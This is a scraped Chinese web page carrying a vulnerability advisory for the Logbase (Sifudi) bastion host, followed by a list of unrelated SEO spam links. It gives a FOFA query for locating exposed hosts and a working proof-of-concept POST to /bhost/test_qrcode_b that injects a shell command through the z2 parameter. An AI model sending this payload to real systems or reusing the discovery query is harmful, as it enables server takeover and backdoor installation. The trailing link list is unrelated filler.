当前位置: 首页 > news >正文

帮别人设计做关于图的网站青岛鲁icp 网站制作 牛商网

帮别人设计做关于图的网站,青岛鲁icp 网站制作 牛商网,贵阳网站开发制作公司,网站微信分享怎么做0x01 产品简介 思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。 0x02 漏洞概述 由于思福迪运维安全管理系统 test_qrcode_b路由存在命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限&#…

0x01 产品简介

思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。

0x02 漏洞概述

由于思福迪运维安全管理系统 test_qrcode_b路由存在命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 复现环境

FOFA:

((title="Logbase" || header="Server: dummy" || body="onclick=\"location.href='trustcert.cgi'") && body!="couchdb") || banner="Server: dummy"

0x04 漏洞复现

PoC

POST /bhost/test_qrcode_b HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Content-Type: application/x-www-form-urlencoded
Referer: https://your-ip
Accept-Encoding: gzip
Connection: closez1=1&z2="|whoami;"&z3=bhost

0x05 修复建议

厂商已发布了漏洞修复程序,请及时关注更新:

http://www.logbase.cn/

http://www.yayakq.cn/news/879935/

相关文章:

  • 外贸seo网站wordpress 封禁账号
  • 网站建设平台协议书模板下载word素材库
  • wordpress做企业网站wordpress 页脚改颜色
  • 旅游模板网站前端可以做网站吗
  • .电子商务网站的开发原则包括网站后台编辑器不能用
  • 五大类型网站市场调研一般怎么做
  • 网站单页支付宝支付怎么做的网站展示模板psd下载
  • 聊天室网站模板主机开通成功网站建设中
  • 湖北响应式网站设计制作wordpress招商
  • 不需要验证码的注册网站网站建设改版方案
  • 网站建设俄语免费创建社区平台
  • 百度怎么推广网站纺织网站模板
  • 什么网站可以自己做名片flash 源码网站
  • 在网站的标题上怎么做图标网站域名做跳转要收费吗
  • 网站建设精品课程asp 茶叶网站模板
  • 常州低价网站建设公司网业版
  • 九五至尊娱乐场网站免费不收费网站有哪些
  • 商业网站是怎么做的赛雷猴是什么意思
  • 公司网站建设的会计分录北京企业查询
  • app产品网站模板所有网站都要备案吗
  • 网站改版 价格成都锦江规划建设局网站
  • 驻马店哪家做网站好seo课程总结
  • 南宁网站建设免费推广wordpress m3u8 插件
  • 盐城市城乡和住房建设厅网站全国新农村建设中心网站
  • 高端品牌网站建设有哪些iis 网站访问权限 设置
  • 图片做旧网站wordpress和网站区别
  • 网站开分站灯罩技术支持东莞网站建设
  • html5响应式网站源码网站开发实验的总结
  • asp企业网站cms做一张网站图得多少钱
  • 西固网站建设平台wordpress 移动端 接口